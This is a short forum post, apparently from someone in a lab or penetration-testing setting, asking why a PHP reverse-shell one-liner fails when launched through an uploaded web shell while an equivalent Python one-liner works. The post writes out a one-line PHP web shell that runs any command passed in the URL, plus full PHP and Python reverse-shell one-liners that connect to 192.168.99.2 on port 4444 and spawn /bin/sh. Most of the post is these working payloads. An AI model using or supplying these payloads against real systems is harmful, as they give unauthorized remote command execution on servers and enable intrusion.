Hi,
I uploaded a simple shell in a webserver:
<?php echo exec($_GET['cmd']);?>
The system have python, and obviously PHP installed. I don’t understand why my PHP reverse shell one-liner is not working executing the command via the PHP simple shell:
php -r ‘$sock=fsockopen(“192.168.99.2”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’
If I use an equivalent command, but with Python, it works:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.99.2”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
And now, if I execute the first command from the spawned shell with Python, then the PHP one-liner works… I tried to find why is that, but can’t find the answer, maybe not searching correct terms.
Looks like the problem is when the command is executed from the browser, something is not working. If I just try to open the socket, I receive the connection in the listener, or if I exec touch /tmp/touched, instead of /bin/sh... the file is created, but if I use the complete one-liner then didn’t work.
Anyone knows why is that happening? Why python is working but PHP not?
Thanks!